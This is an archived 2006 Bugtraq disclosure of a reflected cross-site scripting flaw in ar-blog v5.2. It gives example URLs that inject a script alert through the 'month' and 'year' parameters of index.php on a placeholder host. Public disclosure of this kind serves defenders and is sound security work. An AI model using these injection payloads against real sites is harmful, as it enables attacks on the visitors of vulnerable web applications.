[42326] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

-2- [XSS] in ar-blog v 5.2

daemon@ATHENA.MIT.EDU (s3ude@hotmail.com)
Thu Jan 19 22:58:08 2006

Date: 18 Jan 2006 13:52:58 -0000
Message-ID: <20060118135258.15017.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: s3ude@hotmail.com
To: bugtraq@securityfocus.com

Software: ar-blog 
Web Site: http://www.ar-blog.com
Versions: ar-blog v 5.2
Type: Cross Site Scripting
Class: Remote



Exploit : 

1-

http://www.target.com/index.php?page=showtopis&month=[XSS]&year=1426&all=9

2-

http://www.target.com/index.php?page=showtopis&month=9&year=[XSS]&all=9

Example : 

1-

http://www.target.com/index.php?page=showtopis&month=<script>alert("www.LeZr.Com")</script>

2- 

http://www.target.com/index.php?page=showtopis&month=9&year=<script>alert("www.LeZr.Com")</script>&all=9

Discovered by: SAUDI

L-G-H Team

http://www.lezr.com

Regards ///


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[42326] in bugtraq

-2- [XSS] in ar-blog v 5.2

daemon@ATHENA.MIT.EDU (s3ude@hotmail.com)Thu Jan 19 22:58:08 2006

daemon@ATHENA.MIT.EDU (s3ude@hotmail.com)
Thu Jan 19 22:58:08 2006